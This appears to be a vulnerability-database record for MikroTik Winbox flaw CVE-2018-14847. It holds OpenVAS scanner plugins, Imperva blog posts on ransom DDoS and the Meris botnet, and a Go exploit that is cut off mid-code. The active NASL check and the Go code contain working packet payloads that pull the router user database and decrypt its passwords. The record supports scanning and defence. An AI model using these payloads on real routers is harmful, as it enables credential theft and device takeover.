MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:mikrotik:routeros\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141279\");\n script_version(\"$Revision: 14086 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-11 10:05:57 +0100 (Mon, 11 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-06 14:10:44 +0200 (Fri, 06 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n\n script_cve_id(\"CVE-2018-14847\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mikrotik_router_routeros_consolidation.nasl\");\n script_mandatory_keys(\"mikrotik/detected\");\n script_require_ports(8291);\n\n script_tag(name:\"summary\", value:\"This host is running Mikrotik RouterOS and is prone to information\ndisclosure vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the winbox service of routeros which\nallows remote users to download a user database file without successful authentication.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted request and checks the response.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to connect to the WinBox\nport and download a user database file. 
The remote user can then log in and take control of the router.\");\n\n script_tag(name:\"affected\", value:\"MikroTik Router OS versions 6.29 through 6.42, 6.43rcx prior to 6.43rc4.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MikroTik Router OS version 6.42.1 or 6.43rc4 or later.\");\n\n script_xref(name:\"URL\", value:\"https://forum.mikrotik.com/viewtopic.php?t=133533\");\n script_xref(name:\"URL\", value:\"https://n0p.me/winbox-bug-dissection/\");\n script_xref(name:\"URL\", value:\"https://github.com/BasuCert/WinboxPoC\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\nport = 8291;\n\nif (!get_tcp_port_state(port))\n exit(0);\n\nsoc = open_sock_tcp(port);\nif (!soc)\n exit(0);\n\nquery1 = raw_string(0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\n 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\n 0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,\n 0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\n 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\n 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\n 0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\n 0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\n 0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\n 0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\n 0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\n 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\n 0x00, 0x00);\n\nsend(socket: soc, data: query1);\nrecv = recv(socket: soc, length: 1024);\n\nif (!recv || strlen(recv) < 39) {\n close(soc);\n exit(0);\n}\n\nsessionid = recv[38];\n\nquery2 = raw_string(0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\n 0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\n 0x00, 0xfe, 0x09, sessionid, 0x02, 0x00, 0x00, 0x08,\n 0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\n 0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\n 0x00, 0x02, 0x00, 0x00, 0x00);\n\nsend(socket: soc, data: 
query2);\nrecv = recv(socket: soc, length: 1024);\nclose(soc);\n\nif (!recv || \"M2\" >!< recv)\n exit(0);\n\nentries = split(recv, sep: \"M2\", keep: FALSE);\nforeach entry (entries) {\n # Username\n idx = stridx(entry, raw_string(0x01, 0x00, 0x00, 0x21)); # marker for username\n if (idx < 0)\n continue;\n\n user_len = ord(entry[idx + 4]);\n username = substr(entry, idx+5, idx+5+user_len-1);\n\n # Password\n idx = stridx(entry, raw_string(0x11, 0x00, 0x00, 0x21)); # marker for password\n if (idx < 0)\n continue;\n\n password = \"\";\n pw_len = ord(entry[idx + 4]);\n if (pw_len == 0) {\n password = \"No/empty password\";\n } else {\n pw = substr(entry, idx+5, idx+5+pw_len-1);\n key = MD5(username + '283i4jfkai3389');\n\n for (i=0; i < strlen(pw); i++) {\n char = ord(pw[i]) ^ ord(key[i % strlen(key)]);\n if (char == 0)\n break;\n else\n password += raw_string(ord(pw[i]) ^ ord(key[i % strlen(key)]));\n }\n }\n\n credentials += 'Username: ' + username + '\\nPassword: ' + password + '\\n\\n';\n}\n\nif (credentials) {\n report = 'It was possible to obtain the following credentials:\\n\\n' + credentials;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-05-29T18:32:38", "description": "This host is running Mikrotik RouterOS and is prone to information disclosure\nvulnerability.", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813155", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability\n#\n# Authors:\n# 
Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:mikrotik:routeros\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813155\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 11:34:56 +0530 (Wed, 25 Apr 2018)\");\n\n script_cve_id(\"CVE-2018-14847\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Mikrotik RouterOS and is prone to information disclosure\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in the winbox service of routeros which allows\nremote users to download a user database file without successful 
authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote attacker to connect to the WinBox\nport and download a user database file. The remote user can then log in and take control of the router.\");\n\n script_tag(name:\"affected\", value:\"MikroTik Router OS versions 6.29 through 6.42, 6.43rcx prior to 6.43rc4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to MikroTik Router OS version 6.42.1 or 6.43rc4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://forum.mikrotik.com/viewtopic.php?t=133533\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mikrotik_router_routeros_consolidation.nasl\");\n script_mandatory_keys(\"mikrotik/detected\");\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE) ) exit(0);\nmikVer = infos['version'];\nmikPath = infos['location'];\n\nif (version_in_range(version:mikVer, test_version:\"6.29\", test_version2:\"6.42\")){\n fix = \"6.42.1\";\n} else if (mikVer == \"6.43rc1\" || mikVer == \"6.43rc2\" || mikVer == \"6.43rc3\"){\n fix = \"6.43rc4\";\n}\n\nif (fix) {\n report = report_fixed_ver(installed_version:mikVer, fixed_version:fix, install_path:mikPath);\n security_message( data: report, port: 0);\n exit( 0 );\n}\n\nexit(0);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "impervablog": [{"lastseen": "2022-03-04T17:32:42", "description": "We are only at the beginning of 2022 and it looks like it is going to be an interesting year for the [Distributed Denial of Service](<https://www.imperva.com/products/ddos-protection-services/>) (DDoS) landscape. We recently mitigated a ransom DDoS attack on a single website which reached a rate of 2.5 million requests per second (Mrps). 
And while ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase. For example, we\u2019ve seen instances where the ransom note is included in the attack itself, embedded into a URL request.\n\n_One of several ransom notes received by the customer before the attack started_\n\n## A ransom note as part of the attack? Really?\n\nYes. Increasingly, we are observing more cases like this where the ransom note has been included as part of the attack itself, perhaps as a reminder to the target to send their bitcoin payment. Of course, once the target receives this note the attack is already underway, adding a sense of urgency to the threat. In the case of the 2.5 Mrps DDoS attack, the target had received several warning ransom notes before the first attack began.\n\nThis tactic is not a one-off either. In the same DDoS attack, Imperva mitigated **over 12 million such embedded requests targeting** random URLs on the same site.\n\nThe following sinister message was incorporated into one of the URLs targeted.\n\nAnd the threats didn't stop there. The following day on the same site, Imperva mitigated **over 15 million** requests, this time with the URL containing a different message but using the same scare tactics, warning the CEO that they are going to destroy the company\u2019s stock price if they don\u2019t pay up.\n\nTo show they mean business, the attackers claim responsibility for a previous [attack on the service provider Bandwidth](<https://www.channelfutures.com/security/bandwidth-hit-with-ddos-attack-dealing-with-service-disruptions>), naming themselves the well-known Ransomware-as-a-Service (RaaS) operator REvil. 
_It is not clear however whether the threats were really made by the original REvil group or by an imposter._\n\n## 2.5 million requests per second in under a minute\n\nThroughout the course of the same day the targeted company was hit by several DDoS attacks; the largest of which lasted less than one minute and measured up to 2.5 Mrps, setting a new mitigation record for Imperva. Multiple sites from the same company came under attack with one site sustaining an attack lasting around 10 minutes. The attackers applied sophisticated tactics to avert mitigation with the ransom messages and attack vectors changing constantly. At the same time, to shock the target, the payment amounts demanded kept increasing in size. Despite these tactics Imperva successfully mitigated all of the attacks and demonstrated how important it is to have a fast, accurate and automated DDoS solution in place.\n\nThe story did not end there for the customer as the attacks continued for several days; sometimes lasting up to several hours and in 20 percent of cases reaching a size of between 90 and 750 thousand requests per second (Krps) as the chart below shows.\n\n## Attack origins\n\nThe attacks originated from 34,815 sources and looking at the number of requests per source, there were 2 million requests per IP sent from the top sources during the attack.\n\nThe top source locations for the **2.5 Mrps** attack were Indonesia followed by the United States. And we have seen a pattern emerging of almost identical source locations for different attacks indicating that the same botnet was used many times.\n\n## The botnet\n\nWe have a strong indication that the Meris botnet played a role in these attacks. Although [CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) was published a while ago, attackers can still take advantage of it. 
The CVE refers to a MikroTik vulnerability where thousands of internet of things (IoT) devices, in this case a huge number of MikroTik routers, were manipulated to create a botnet network which can still be used to carry out DDoS and other forms of attack.\n\nIn terms of bandwidth, the results reached a volume of 1.5Gbps of TCP traffic. The dashboard below represents the traffic in our scrubbing centers, before it reached our proxies that mitigated the attacks in the application layer:\n\n## Threat intelligence and Bot protection\n\nDespite the changing attack patterns, Imperva successfully mitigated the attacks within seconds using mainly threat intelligence, as the sources were known to us as malicious; and bot protection, as the clients were impersonating a legitimate browser or google bot. While the largest attack measured 2.5 Mrps the graph below shows how we blocked over 64 million requests in under one minute.\n\n## Repeat performance\n\nWe have since monitored a repeat of this attack pattern against several other customers. While each of the targets receives a unique bitcoin address they are all part of the same coordinated attack.\n\nThe types of sites the threat actors are after appear to be business sites focusing on sales and communications. Targets tend to be US- or Europe-based with the one thing they all have in common being that they are all exchange-listed companies and the threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price. See example below.\n\n## Ransom within a ransom\n\nAnother example of a threat embedded in the attack itself was found in a GET request sent with a link to a notepad.com note.\n\nAnother note (below) contains the now familiar pattern of a ransom demand for payment in bitcoin.\n\n## What's Next?\n\nAs the REvil threat gang mentioned, we can expect more of the same throughout 2022. 
If you don\u2019t already have DDoS Protection in place, now is a good time to prepare for a potential attack. Find out more about Imperva DDoS Protection [here](<https://www.imperva.com/products/ddos-protection-services/>).\n\nThe post [Imperva Mitigates Ransom DDoS Attack Measuring 2.5 Million Requests per Second](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-04T15:21:44", "type": "impervablog", "title": "Imperva Mitigates Ransom DDoS Attack Measuring 2.5 Million Requests per Second", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-04T15:21:44", "id": "IMPERVABLOG:941443220F7C778862BC45A189850EF6", "href": "https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-31T16:22:26", "description": "> Imperva has just released the [**DDoS Threat Landscape 
Report Q1 2022**](<https://www.imperva.com/resources/resource-library/reports/ddos-threat-landscape-report/>). [Download it now](<https://www.imperva.com/resources/resource-library/reports/ddos-threat-landscape-report/>) to familiarize yourself with new threats and get detailed information about current DDoS attack patterns and their potential impact on your business.\n\nSo far, 2022 has been a brutal year for DDoS attacks and we see the attack landscape becoming more problematic going forward. As we consider the changing threat landscape worldwide, let\u2019s look at the top three DDoS attacks that Imperva has stopped to gain a bit of insight into the shape of future attacks.\n\n 1. [February 2022 \u2013 A Layer 7 Application DDoS Attack measuring over 2.5 million rps](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>)\n 2. [July 2021 \u2013 A Network DDoS attack with a throughput of 1.02 Tbps](<https://www.imperva.com/blog/imperva-mitigates-largest-ever-ddos-attack-on-a-customer/>)\n 3. [October 2020 \u2013 The Largest Network DDoS attack of almost 1 Tbps](<https://www.imperva.com/blog/ddos-attacks-grow-more-sophisticated-as-imperva-mitigates-largest-attack/>)\n\n## The October 2020 attack\n\nIn the fall of 2020, we observed a rise in the number of [DDoS attacks](<https://www.imperva.com/learn/ddos/ddos-attacks/>) against our customers where both the volume of attacks and their level of intensity have increased significantly. 
One such attack (mentioned above) peaked at nearly 1 terabyte per second (Tbps), a level of intensity that at the time broke Imperva\u2019s record for attack mitigation to date.\n\nIt wasn\u2019t just the scale of the attack that made it interesting and somewhat terrifying, it was also its sophisticated nature compared to other attacks of this size, which commonly consisted of [amplification vectors](<https://www.imperva.com/learn/ddos/ntp-amplification/>).\n\n### Two waves of Large SYN and TCP\n\nIn this case, the attackers combined two separate vectors, Large SYN and TCP, which they leveraged in two waves. The first consisted of a 90-second burst of [Large SYN flood](<https://www.imperva.com/learn/ddos/syn-flood/>) \u2013 basically a SYN flood with a large payload, unrecognized by the RFC, the document that describes a SYN packet. A SYN flood consumes server resources by creating endless half-open TCP connections. The combination of server exhaustion by SYN flood with a volumetric attack is what makes a large SYN vector so harmful. This initial burst was so powerful that it peaked at 674 Gbps and 148 million packets per second (Mpps) in under five seconds, emphasizing how important it is to start mitigation within seconds. Furthermore, this type of attack would be impossible to mitigate with an on-premise or [hybrid DDoS approach](<https://www.imperva.com/blog/hybrid-ddos-protection-is-like-a-faulty-airbag/>) where the upstream connectivity would be overwhelmed.\n\nWhat\u2019s also interesting about this particular attack is that the attackers used a tool similar to that seen in [the largest packets per-second attack](<https://www.imperva.com/blog/this-ddos-attack-unleashed-the-most-packets-per-second-ever-heres-why-thats-important/>) Imperva mitigated in 2019. The tool attempts to conceal the attacking packets as legitimate traffic by mimicking an Operating System. 
However, the tool apparently contains a bug because it ends up sending malformed packets.\n\nThe second wave of the attack consisted of a TCP ACK flood aimed at port 443, which mimicked the customer\u2019s legitimate traffic by using large HTTPS packets. Despite the customer owning multiple IP ranges, the entire attack targeted only a handful of IPs \u2013 in this case, those hosting the customer\u2019s main services. This suggests that a certain amount of research and reconnaissance had been undertaken by the attacker in advance, enabling them to identify the most vulnerable target IPs and carry out a more sophisticated attack.\n\nWe concluded that this wasn\u2019t a random DDoS attack. The attackers had done their research, enabling them to carry out a highly sophisticated and targeted attack tailored to the customer. We suspect more to come in 2022.\n\n## The July 2021 attack\n\nIn July 2021, Imperva mitigated its largest attack to date as a provider of DDoS protection, and one of the largest DDoS attacks overall that year. The attack lasted for 40 minutes and generated a massive throughput of 1.02 Tbps and 155 million packets per second (Mpps). Imperva also mitigated a large layer 7 DDoS attack in July 2020 which, as with the most recent attack, targeted services hosting online gambling sites making it difficult to rule out a link to the Olympic Games.\n\nThe attackers began by launching a volumetric DNS amplification attack on multiple sources in addition to a high rate SYN flood attack on port 80. The first wave of the attack reached 192 gigabytes per second (Gbps) and 33 million packets per second (Mpps). After only several minutes the attack reached its peak of 1.02 Tbps and 155 Mpps and at that time consisted of a combination of vectors including SYN flood, large SYN, UDP flood and DNS amplification.\n\nIn the days following this event, Imperva also mitigated a second sizable attack which peaked at a bandwidth of 858 Gbps and 225 million PPS. 
This time the attack was longer, lasting two hours, and targeted a specific network prefix (/24 C-Class address) with the attack spanning the entire range of IPs.\n\n## The February 2022 attack\n\nThis case was a ransom DDoS attack on a single website that reached a rate of 2.5 million requests per second (Mrps). And while ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase.\n\nThroughout the course of a single day the targeted company was hit by several DDoS attacks; the largest that we just mentioned measured 2.5 Mrps, was on a single site and lasted less than one minute, which is the current mitigation record for Imperva. In addition to that, multiple sites from the same company came under attack, with one site sustaining an attack lasting around 10 minutes. The attackers applied sophisticated tactics to avert mitigation with the ransom messages and attack vectors changing constantly. At the same time, to shock the target, the payment amounts demanded kept increasing in size. Despite these tactics, Imperva successfully mitigated all of the attacks and demonstrated how important it is to have a fast, accurate, and automated DDoS solution in place. The story did not end there for the customer as the attacks continued for several days; sometimes lasting up to several hours and in 20 percent of cases reaching a size of between 90 and 750 thousand requests per second (Krps) as the chart below shows.\n\nThe attacks originated from 34,815 sources and looking at the number of requests per source, there were 2 million requests per IP sent from the top sources during the attack. The top source locations for the 2.5 Mrps attack were Indonesia followed by the United States. And we have seen a pattern emerging of almost identical source locations for different attacks indicating that the same botnet was used many times.\n\nWe have a strong indication that the Meris botnet played a role in these attacks. 
Although CVE-2018-14847 was published a while ago, attackers can still take advantage of it. The CVE refers to a MikroTik vulnerability where thousands of internet of things (IoT) devices, in this case a huge number of MikroTik routers, were manipulated to create a botnet network that can still be used to carry out DDoS and other forms of attack.\n\n## Get the DDoS protection you need now\n\nWhy are we taking this stroll down (bad) memory lane? More than anything, we want to help our customers and prospective customers to be aware of current and future DDoS risks so they have the capacity to mitigate them should a large attack come. As we consider the dynamic and concerning threat landscape that we have already observed this year, now is as good a time as ever to urge every organization to assess readiness and if necessary, take action.\n\nAs you have seen, [DDoS Protection](<https://www.imperva.com/products/ddos-protection-services/>) secures all your assets at the edge for uninterrupted operation without affecting the flow of business-critical traffic. 
[Contact us](<https://www.imperva.com/contact-us/>) to learn how to get started.\n\nThe post [The 3 Biggest DDoS Attacks Imperva Has Mitigated](<https://www.imperva.com/blog/the-3-biggest-ddos-attacks-imperva-has-mitigated/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-31T15:12:48", "type": "impervablog", "title": "The 3 Biggest DDoS Attacks Imperva Has Mitigated", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-05-31T15:12:48", "id": "IMPERVABLOG:C35627F2B3AFD564AE9A15BFC7474967", "href": "https://www.imperva.com/blog/the-3-biggest-ddos-attacks-imperva-has-mitigated/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:34", "description": "\nMikrotik WinBox 6.42 - Credential Disclosure (golang)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", 
"baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-08-17T00:00:00", "type": "exploitpack", "title": "Mikrotik WinBox 6.42 - Credential Disclosure (golang)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-17T00:00:00", "id": "EXPLOITPACK:34440D2AB17F925EB3B4582B358E548F", "href": "", "sourceData": "/*\n\n# Title: Mikrotik WinBox 6.42 - Credential Disclosure ( golang edition )\n# Author: Maxim Yefimenko ( @slider )\n# Date: 2018-08-06\n# Software Link: https://mikrotik.com/download\n# Vendor Page: https://www.mikrotik.com/\n# Version: 6.29 - 6.42\n# Tested on: Fedora 28 \\ Debian 9 \\ Windows 10 \\ Android ( wherever it was possible to compile.. 
it's golang ^_^ )\n# CVE: CVE-2018-14847\n# References:\n# ( Alireza Mosajjal ) https://github.com/mosajjal https://n0p.me/winbox-bug-dissection/\n# ( BasuCert ) https://github.com/BasuCert/WinboxPoC\n# ( manio ) https://github.com/manio/mtpass/blob/master/mtpass.cpp\n# and special thanks to Dmitriy_Area51\n\n*/\n\npackage main\n\nimport (\n\t\"crypto/md5\"\n\t\"fmt\"\n\t\"net\"\n\t\"os\"\n\t\"strings\"\n\t\"time\"\n)\n\nvar (\n\ta = []byte{0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,\n\t\t0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,\n\t\t0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,\n\t\t0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,\n\t\t0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,\n\t\t0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,\n\t\t0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,\n\t\t0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,\n\t\t0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,\n\t\t0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t\t0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,\n\t\t0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,\n\t\t0x00, 0x00}\n\n\tb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,\n\t\t0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,\n\t\t0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,\n\t\t0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,\n\t\t0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,\n\t\t0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,\n\t\t0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,\n\t\t0x00, 0x02, 0x00, 0x00, 0x00}\n\n\tbuf = make([]byte, 1024*8)\n)\n\nfunc checkErr(err error) {\n\tif err != nil {\n\t\tfmt.Println(\"Error:\" + err.Error())\n\t}\n}\n\nfunc decryptPassword(user []byte, passEnc []byte) string {\n\tvar passw []byte\n\thasher := md5.New()\n\thasher.Write(user)\n\thasher.Write([]byte(\"283i4jfkai3389\"))\n\tkey := hasher.Sum(nil)\n\n\tfor i := 0; i < len(passEnc); i++ {\n\t\tpassw = append(passw, 
passEnc[i]^key[i%len(key)])\n\t}\n\n\treturn string(ASCIIonly(passw))\n}\n\nfunc ASCIIonly(s []byte) []byte {\n\tfor i, c := range s {\n\t\tif c < 32 || c > 126 {\n\t\t\treturn s[:i]\n\t\t}\n\t}\n\treturn s\n}\n\nfunc extractPass(buff []byte) (s []string) {\n\tvar (\n\t\tusr []byte\n\t\tpwd []byte\n\t)\n\n\t//searching for StartOfRecord\n\tfor i := 0; i < len(buff); i++ {\n\n\t\tif i+2 >= len(buff) {\n\t\t\tbreak\n\t\t}\n\n\t\tif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) {\n\t\t\t// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i)\n\n\t\t\t//some bytes ahead is enable/disable flag\n\t\t\ti += int((buff[i+2] - 5))\n\t\t\tif i >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t//searching for StartOfRecNumber\n\t\t\tif i+3 >= len(buff) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) {\n\t\t\t\ti++\n\t\t\t\tif i+3 >= len(buff) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t}\n\n\t\t\ti += 4\n\t\t\tif i >= len(buff) 